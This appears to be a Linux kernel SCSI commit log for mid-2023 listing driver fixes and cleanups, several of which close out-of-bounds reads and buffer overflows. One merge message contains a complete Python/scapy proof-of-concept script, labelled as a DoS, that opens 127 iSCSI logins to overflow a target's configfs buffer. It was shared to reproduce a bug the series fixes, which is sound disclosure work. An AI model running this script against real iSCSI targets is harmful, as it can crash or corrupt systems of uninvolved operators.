- 08 Aug, 2023 12 commits
-
-
Martin K. Petersen authored
Ranjan Kumar <ranjan.kumar@broadcom.com> says: Few Enhancements and minor fixes of mpi3mr driver. Link: https://lore.kernel.org/r/20230804104248.118924-1-ranjan.kumar@broadcom.comSigned-off-by:
Martin K. Petersen <martin.petersen@oracle.com>
-
Ranjan Kumar authored
Update driver version to 8.5.0.0.0 Signed-off-by:
Ranjan Kumar <ranjan.kumar@broadcom.com> Link: https://lore.kernel.org/r/20230804104248.118924-7-ranjan.kumar@broadcom.comSigned-off-by:
-
Ranjan Kumar authored
Mark all of the devices that are exposed to the OS prior to a controller reset and not detected by the controller after the reset as removed devices and the I/Os to those devices are unblocked (and returned with DID_NO_CONNECT) prior to removing the devices one after the other. Signed-off-by:
-
Ranjan Kumar authored
Enhance driver to divert the WRITE SAME commands that are issued with UNMAP=1 and NDOB=1 and with the transfer length greater than the max WRITE SAME length specified by the firmware for the particular drive to the controller firmware. Reported-by:
kernel test robot <lkp@intel.com> Closes: https://lore.kernel.org/oe-kbuild-all/202307280034.DXU5pTVV-lkp@intel.com/Signed-off-by:
-
Ranjan Kumar authored
Enhance the driver to get the maximum data length per I/O request from IOC Facts data and report that to the upper layers. If the IOC facts data is not reported then a default I/O size of 1MB is reported to the OS. Signed-off-by:
-
Ranjan Kumar authored
Updated MPI Headers to version 3.00.28. Signed-off-by:
-
Ranjan Kumar authored
When a timestamp update or an event acknowledgment command times out, the driver invokes the soft reset handler to recover the controller while holding a mutex lock. The soft reset handler also tries to acquire the same mutex to send initialization commands to the controller which leads to a deadlock scenario. To resolve the issue the driver will check thestatus and if this indicates the controller is operational, the driver will issue a diagnostic fault reset and exit out of the command processing function. If the controller is already faulted or asynchronously reset, then the driver will just exit the command processing function. Signed-off-by:
-
Justin Tee authored
Only nodes whose state is at least past a PLOGI issue and strictly less than a PRLI issue should be put into device recovery mode upon RSCN receipt. Previously, the allowance of LOGO and PRLI completion states did not make sense because those nodes should be allowed to flow through and marked as NPort dissappeared as is normally done. A follow up RSCN GID_FT would recover those nodes in such cases. Signed-off-by:
Justin Tee <justin.tee@broadcom.com> Link: https://lore.kernel.org/r/20230804195546.157839-1-justintee8345@gmail.comSigned-off-by:
-
Manivannan Sadhasivam authored
ufs_qcom_bw_table is not modified anywhere. So make it static const so that it can be placed in read-only memory. Reported-by:
Bart Van Assche <bvanassche@acm.org> Closes: https://lore.kernel.org/linux-scsi/43cd0057-c6d8-bc92-08f4-d767336d2cfe@acm.org/Signed-off-by:
Manivannan Sadhasivam <manivannan.sadhasivam@linaro.org> Link: https://lore.kernel.org/r/20230802040154.10652-1-manivannan.sadhasivam@linaro.orgReviewed-by:
-
Bart Van Assche authored
gcc compilers before version 10 cannot do constant-folding for sub-byte bitfields. This makes the compiler layout tests fail. Hence skip the layout checks for gcc 9 and before. Cc: Arnd Bergmann <arnd@arndb.de> Cc: Naresh Kamboju <naresh.kamboju@linaro.org> Cc: Nathan Chancellor <nathan@kernel.org> Reported-by:
Naresh Kamboju <naresh.kamboju@linaro.org> Closes: https://lore.kernel.org/linux-scsi/CA+G9fYur8UJoUyTLJFVEJPh-15TJ7kbdD2q8xVz8a3fLjkxxVw@mail.gmail.com/Suggested-by:
Arnd Bergmann <arnd@arndb.de> Signed-off-by:
-
Nitin Rawat authored
Commit 52a51801 ("scsi: ufs: core: Fix missing clk change notification on host reset") added UFS clock scaling notification to ufshcd_host_reset_and_restore(). This invokes hibern8 enter and exit on Qualcomm platform which fails because controller is in reset state. Fix this by checking the Host controller state before sending hibern8 command. __ufshcd_wl_resume() ufshcd_reset_and_restore() ufshcd_host_reset_and_restore() ufshcd_scale_clks() ufshcd_vops_clk_scale_notify() ufs_qcom_clk_scale_notify() ufshcd_uic_hibern8_enter() Fixes: 52a51801 ("scsi: ufs: core: Fix missing clk change notification on host reset") Co-developed-by:
Manish Pandey <quic_mapa@quicinc.com> Signed-off-by:
Nitin Rawat <quic_nitirawa@quicinc.com> Link: https://lore.kernel.org/r/20230726134140.7180-3-quic_nitirawa@quicinc.comAcked-by:
Manivannan Sadhasivam <mani@kernel.org> Signed-off-by:
-
Nitin Rawat authored
Export ufshcd_is_hba_active() to allow driver modules to check the state of the host controller. Signed-off-by:
-
- 31 Jul, 2023 23 commits
-
-
Martin K. Petersen authored
Bart Van Assche <bvanassche@acm.org> says: Hi Martin, This patch includes the following changes, none of which should change the functionality of the UFS host controller driver: - Improve the kernel-doc headers further. - Fix multiple W=2 compiler warnings. - Simplify ufshcd_abort_all(). - Simplify the code for creating and parsing UFS Transport Protocol (UTP) headers. Please consider this patch series for the next merge window. Thanks, Bart. Link: https://lore.kernel.org/r/20230727194457.3152309-1-bvanassche@acm.orgSigned-off-by:
-
Bart Van Assche authored
Make the code that parses UTP transfer request headers easier to read by using u8 instead of __be32 where appropriate. Signed-off-by:
Avri Altman <avri.altman@wdc.com> Signed-off-by:
-
Bart Van Assche authored
Make the code that initializes UTP transfer request headers easier to read by using bitfields instead of __le32 where appropriate. Cc: "Bao D. Nguyen" <quic_nguyenb@quicinc.com> Cc: Eric Biggers <ebiggers@google.com> Cc: Avri Altman <avri.altman@wdc.com> Cc: Bean Huo <beanhuo@micron.com> Cc: Adrian Hunter <adrian.hunter@intel.com> Signed-off-by:
-
Bart Van Assche authored
Remove the 'response' member variable because no code reads its value. Additionally, move the ufs_query_req and ufs_query_res data structure definitions into include/ufs/ufshcd.h because these data structures are related to the UFS host controller driver. Reviewed-by:
-
Bart Van Assche authored
Unify the MCQ and legacy code paths. This patch reworks code introduced by commit ab248643 ("scsi: ufs: core: Add error handling for MCQ mode"). Cc: "Bao D. Nguyen" <quic_nguyenb@quicinc.com> Signed-off-by:
-
Bart Van Assche authored
No functionality is changed. This patch prepares for unifying the MCQ and legacy code paths in this function. Signed-off-by:
-
Bart Van Assche authored
Assign names to the enumeration types for UPIU types. Use these enumeration types where appropriate. Signed-off-by:
-
Bart Van Assche authored
Use { } instead of { { 0 }, } to zero-initialize data structures on the stack. This patch fixes two W=2 warnings. Signed-off-by: -
Bart Van Assche authored
Only #include those header files that are needed. Note: include/ufs/ufshcd.h needs <scsi/scsi_host.h> because of SG_ALL. Signed-off-by:
-
Bart Van Assche authored
This patch suppresses the following W=2 warning: drivers/ufs/core/ufs-hwmon.c:130:49: warning: declaration of ‘_data’ shadows a global declaration [-Wshadow] Reviewed-by:
-
Bart Van Assche authored
Fix the remaining kernel-doc warnings that are reported when building with W=2. Signed-off-by:
-
Bart Van Assche authored
This patch fixes multiple W=2 kernel-doc warnings. Signed-off-by:
-
Bart Van Assche authored
Use 'Return:' to document the return value instead of 'Returns' as required by the kernel-doc documentation. Signed-off-by:
-
Manivannan Sadhasivam authored
Qcom SoCs require scaling the interconnect paths for proper working of the peripherals connected through interconnects. Even for accessing the UFS controller, someone should setup the interconnect paths. So far, the bootloaders used to setup the interconnect paths before booting Linux as they need to access the UFS storage for things like fetching boot firmware. But with the advent of multi boot options, bootloader nowadays like in SA8540p SoC do not setup the interconnect paths at all. So trying to configure UFS in the absence of the interconnect path configuration results in a boot crash. To fix this issue, and also to dynamically scale the interconnects (UFS-DDR and CPU-UFS), interconnect API support is added to the Qcom UFS driver. With this support, the interconnect paths are scaled dynamically based on the gear configuration. During the early stage of ufs_qcom_init(), ufs_qcom_icc_init() will setup the paths to max bandwidth to allow configuring the UFS registers. Touching the registers without configuring the icc paths would result in a crash. However, we don't really need to set max vote for the icc paths as any minimal vote would suffice. But the max value would allow initialization to be done faster. After init, the bandwidth will get updated using ufs_qcom_icc_update_bw() based on the gear and lane configuration. The bandwidth values defined in ufs_qcom_bw_table struct are taken from Qcom downstream vendor devicetree source and are calculated as per the UFS3.1 Spec, Section 6.4.1, HS Gear Rates. So it is fixed across platforms. Cc: Brian Masney <bmasney@redhat.com> Signed-off-by:
-
Manivannan Sadhasivam authored
Since there are enums available for UFS gears, let's add enums for lanes as well to maintain uniformity. Signed-off-by:
-
Oleksandr Natalenko authored
The qedf_dbg_fp_int_cmd_read() function invokes sprintf() directly on a __user pointer, which may crash the kernel. Avoid doing that by vmalloc()'ating a buffer for scnprintf() and then calling simple_read_from_buffer() which does a proper copy_to_user() call. Fixes: 61d8658b ("scsi: qedf: Add QLogic FastLinQ offload FCoE driver framework.") Link: https://lore.kernel.org/lkml/20230724120241.40495-1-oleksandr@redhat.com/ Link: https://lore.kernel.org/linux-scsi/20230726101236.11922-1-skashyap@marvell.com/ Cc: Saurav Kashyap <skashyap@marvell.com> Cc: Rob Evers <revers@redhat.com> Cc: Johannes Thumshirn <Johannes.Thumshirn@wdc.com> Cc: David Laight <David.Laight@ACULAB.COM> Cc: Jozef Bacik <jobacik@redhat.com> Cc: Laurence Oberman <loberman@redhat.com> Cc: "James E.J. Bottomley" <jejb@linux.ibm.com> Cc: "Martin K. Petersen" <martin.petersen@oracle.com> Cc: GR-QLogic-Storage-Upstream@marvell.com Cc: linux-scsi@vger.kernel.org Reviewed-by:
Laurence Oberman <loberman@redhat.com> Reviewed-by:
Johannes Thumshirn <johannes.thumshirn@wdc.com> Tested-by:
Saurav Kashyap <skashyap@marvell.com> Signed-off-by:
Oleksandr Natalenko <oleksandr@redhat.com> Link: https://lore.kernel.org/r/20230731084034.37021-4-oleksandr@redhat.comSigned-off-by:
-
Oleksandr Natalenko authored
The qedf_dbg_debug_cmd_read() function invokes sprintf() directly on a __user pointer, which may crash the kernel. Avoid doing that by using a small on-stack buffer for scnprintf() and then calling simple_read_from_buffer() which does a proper copy_to_user() call. Fixes: 61d8658b ("scsi: qedf: Add QLogic FastLinQ offload FCoE driver framework.") Link: https://lore.kernel.org/lkml/20230724120241.40495-1-oleksandr@redhat.com/ Link: https://lore.kernel.org/linux-scsi/20230726101236.11922-1-skashyap@marvell.com/ Cc: Saurav Kashyap <skashyap@marvell.com> Cc: Rob Evers <revers@redhat.com> Cc: Johannes Thumshirn <Johannes.Thumshirn@wdc.com> Cc: David Laight <David.Laight@ACULAB.COM> Cc: Jozef Bacik <jobacik@redhat.com> Cc: Laurence Oberman <loberman@redhat.com> Cc: "James E.J. Bottomley" <jejb@linux.ibm.com> Cc: "Martin K. Petersen" <martin.petersen@oracle.com> Cc: GR-QLogic-Storage-Upstream@marvell.com Cc: linux-scsi@vger.kernel.org Reviewed-by:
-
Oleksandr Natalenko authored
The qedf_dbg_stop_io_on_error_cmd_read() function invokes sprintf() directly on a __user pointer, which may crash the kernel. Avoid doing that by using a small on-stack buffer for scnprintf() and then calling simple_read_from_buffer() which does a proper copy_to_user() call. Fixes: 61d8658b ("scsi: qedf: Add QLogic FastLinQ offload FCoE driver framework.") Link: https://lore.kernel.org/lkml/20230724120241.40495-1-oleksandr@redhat.com/ Link: https://lore.kernel.org/linux-scsi/20230726101236.11922-1-skashyap@marvell.com/ Cc: Saurav Kashyap <skashyap@marvell.com> Cc: Rob Evers <revers@redhat.com> Cc: Johannes Thumshirn <Johannes.Thumshirn@wdc.com> Cc: David Laight <David.Laight@ACULAB.COM> Cc: Jozef Bacik <jobacik@redhat.com> Cc: Laurence Oberman <loberman@redhat.com> Cc: "James E.J. Bottomley" <jejb@linux.ibm.com> Cc: "Martin K. Petersen" <martin.petersen@oracle.com> Cc: GR-QLogic-Storage-Upstream@marvell.com Cc: linux-scsi@vger.kernel.org Reviewed-by:
-
Sunil V L authored
LKP reports below warning when building for RISC-V with randconfig configuration. drivers/scsi/hisi_sas/hisi_sas_v3_hw.c:4567:35: sparse: sparse: incorrect type in argument 4 (different base types) @@ expected restricted __le32 [usertype] *[assigned] ptr @@ got unsigned int * @@ Type cast to fix this warning. Reported-by:
Sunil V L <sunilvl@ventanamicro.com> Link: https://lore.kernel.org/r/20230726051759.30038-1-sunilvl@ventanamicro.comReviewed-by:
Xiang Chen <chenxiang66@hisilicon.com> Signed-off-by:
-
Martin K. Petersen authored
Konstantin Shelekhin <k.shelekhin@yadro.com> says: This patch series cleanses iscsi_target_configfs.c of sprintf usage. The first patch fixes the real problem, the second just makes sure we are on the safe side from now on. I've reproduced the issue fixed in the first patch by utilizing this cool thing: https://git.sr.ht/~kshelekhin/scapy-iscsi Yeah, shameless promoting of my own tools, but I like the simplicity of scapy and writing tests in C with libiscsi can be a little cumbersome. Check it out: #!/usr/bin/env python3 # Let's cause some DoS in iSCSI target import sys from scapy.supersocket import StreamSocket from scapy_iscsi.iscsi import * cpr = { "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59", "TargetName": "iqn.2023-07.com.example:target", "HeaderDigest": "None", "DataDigest": "None", } spr = { "SessionType": "Normal", "ErrorRecoveryLevel": 0, "DefaultTime2Retain": 0, "DefaultTime2Wait": 2, "ImmediateData": "Yes", "FirstBurstLength": 65536, "MaxBurstLength": 262144, "MaxRecvDataSegmentLength": 262144, "MaxOutstandingR2T": 1, } if len(sys.argv) != 3: print("usage: dos.py <host> <port>", file=sys.stderr) exit(1) host = sys.argv[1] port = int(sys.argv[2]) isid = 0xB00B tsih = 0 connections = [] for i in range(0, 127): s = socket.socket() s.connect((host, port)) s = StreamSocket(s, ISCSI) ds = cpr if i > 0 else cpr | spr lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds)) lirs = s.sr1(lirq) tsih = lirs.tsih connections.append(s) input() Link: https://lore.kernel.org/r/20230722152657.168859-1-k.shelekhin@yadro.comSigned-off-by:
-
Konstantin Shelekhin authored
Get rid of sprintf() in favor of sysfs_emit(). The latter ensures not to overflow the given buffer. Signed-off-by:
Konstantin Shelekhin <k.shelekhin@yadro.com> Link: https://lore.kernel.org/r/20230722152657.168859-3-k.shelekhin@yadro.comSigned-off-by:
-
Konstantin Shelekhin authored
The function lio_target_nacl_info_show() uses sprintf() in a loop to print details for every iSCSI connection in a session without checking for the buffer length. With enough iSCSI connections it's possible to overflow the buffer provided by configfs and corrupt the memory. This patch replaces sprintf() with sysfs_emit_at() that checks for buffer boundries. Signed-off-by:
-
Wang Jinchao authored
When building with CONFIG_AIC7XXX_BUILD_FIRMWARE=y, two fatal errors are reported as shown below: aicasm_gram.tab.c:203:10: fatal error: aicasm_gram.tab.h: No such file or directory aicasm_macro_gram.tab.c:167:10: fatal error: aicasm_macro_gram.tab.h: No such file or directory Fix these issues to make randconfig builds more reliable. [mkp: add missing include] Signed-off-by:
Wang Jinchao <wangjinchao@xfusion.com> Link: https://lore.kernel.org/r/ZK0XIj6XzY5MCvtd@fedoraSigned-off-by:
-
- 26 Jul, 2023 5 commits
-
-
YueHaibing authored
This is not used anymore and can be removed. Signed-off-by:
YueHaibing <yuehaibing@huawei.com> Link: https://lore.kernel.org/r/20230725141531.10424-1-yuehaibing@huawei.comReviewed-by:
Chris Leech <cleech@redhat.com> Signed-off-by:
-
Lin Ma authored
There are three places that qla4xxx parses nlattrs: - qla4xxx_set_chap_entry() - qla4xxx_iface_set_param() - qla4xxx_sysfs_ddb_set_param() and each of them directly converts the nlattr to specific pointer of structure without length checking. This could be dangerous as those attributes are not validated and a malformed nlattr (e.g., length 0) could result in an OOB read that leaks heap dirty data. Add the nla_len check before accessing the nlattr data and return EINVAL if the length check fails. Fixes: 26ffd7b4 ("[SCSI] qla4xxx: Add support to set CHAP entries") Fixes: 1e9e2be3 ("[SCSI] qla4xxx: Add flash node mgmt support") Fixes: 00c31889 ("[SCSI] qla4xxx: fix data alignment and use nl helpers") Signed-off-by:
Lin Ma <linma@zju.edu.cn> Link: https://lore.kernel.org/r/20230723080053.3714534-1-linma@zju.edu.cnReviewed-by:
-
Lin Ma authored
beiscsi_iface_set_param() parses nlattr with nla_for_each_attr and assumes every attributes can be viewed as struct iscsi_iface_param_info. This is not true because there is no any nla_policy to validate the attributes passed from the upper function iscsi_set_iface_params(). Add the nla_len check before accessing the nlattr data and return EINVAL if the length check fails. Fixes: 0e43895e ("[SCSI] be2iscsi: adding functionality to change network settings using iscsiadm") Signed-off-by:
-
Lin Ma authored
The functions iscsi_if_set_param() and iscsi_if_set_host_param() convert an nlattr payload to type char* and then call C string handling functions like sscanf and kstrdup: char *data = (char*)ev + sizeof(*ev); ... sscanf(data, "%d", &value); However, since the nlattr is provided by the user-space program and the nlmsg skb is allocated with GFP_KERNEL instead of GFP_ZERO flag (see netlink_alloc_large_skb() in netlink_sendmsg()), dirty data on the heap can lead to an OOB access for those string handling functions. By investigating how the bug is introduced, we find it is really interesting as the old version parsing code starting from commit fd7255f5 ("[SCSI] iscsi: add sysfs attrs for uspace sync up") treated the nlattr as integer bytes instead of string and had length check in iscsi_copy_param(): if (ev->u.set_param.len != sizeof(uint32_t)) BUG(); But, since the commit a54a52ca ("[SCSI] iscsi: fixup set/get param functions"), the code treated the nlattr as C string while forgetting to add any strlen checks(), opening the possibility of an OOB access. Fix the potential OOB by adding the strlen() check before accessing the buf. If the data passes this check, all low-level set_param handlers can safely treat this buf as legal C string. Fixes: fd7255f5 ("[SCSI] iscsi: add sysfs attrs for uspace sync up") Fixes: 1d9bf13a ("[SCSI] iscsi class: add iscsi host set param event") Signed-off-by:
-
Lin Ma authored
The current NETLINK_ISCSI netlink parsing loop checks every nlmsg to make sure the length is bigger than sizeof(struct iscsi_uevent) and then calls iscsi_if_recv_msg(). nlh = nlmsg_hdr(skb); if (nlh->nlmsg_len < sizeof(*nlh) + sizeof(*ev) || skb->len < nlh->nlmsg_len) { break; } ... err = iscsi_if_recv_msg(skb, nlh, &group); Hence, in iscsi_if_recv_msg() the nlmsg_data can be safely converted to iscsi_uevent as the length is already checked. However, in other cases the length of nlattr payload is not checked before the payload is converted to other data structures. One example is iscsi_set_path() which converts the payload to type iscsi_path without any checks: params = (struct iscsi_path *)((char *)ev + sizeof(*ev)); Whereas iscsi_if_transport_conn() correctly checks the pdu_len: pdu_len = nlh->nlmsg_len - sizeof(*nlh) - sizeof(*ev); if ((ev->u.send_pdu.hdr_size > pdu_len) .. err = -EINVAL; To sum up, some code paths called in iscsi_if_recv_msg() do not check the length of the data (see below picture) and directly convert the data to another data structure. This could result in an out-of-bound reads and heap dirty data leakage. _________ nlmsg_len(nlh) _______________ / \ +----------+--------------+---------------------------+ | nlmsghdr | iscsi_uevent | data | +----------+--------------+---------------------------+ \ / iscsi_uevent->u.set_param.len Fix the issue by adding the length check before accessing it. To clean up the code, an additional parameter named rlen is added. The rlen is calculated at the beginning of iscsi_if_recv_msg() which avoids duplicated calculation. Fixes: ac20c7bf ("[SCSI] iscsi_transport: Added Ping support") Fixes: 43514774 ("[SCSI] iscsi class: Add new NETLINK_ISCSI messages for cnic/bnx2i driver.") Fixes: 1d9bf13a ("[SCSI] iscsi class: add iscsi host set param event") Fixes: 01cb225d ("[SCSI] iscsi: add target discvery event to transport class") Fixes: 264faaaa ("[SCSI] iscsi: add transport end point callbacks") Fixes: fd7255f5 ("[SCSI] iscsi: add sysfs attrs for uspace sync up") Signed-off-by:
-
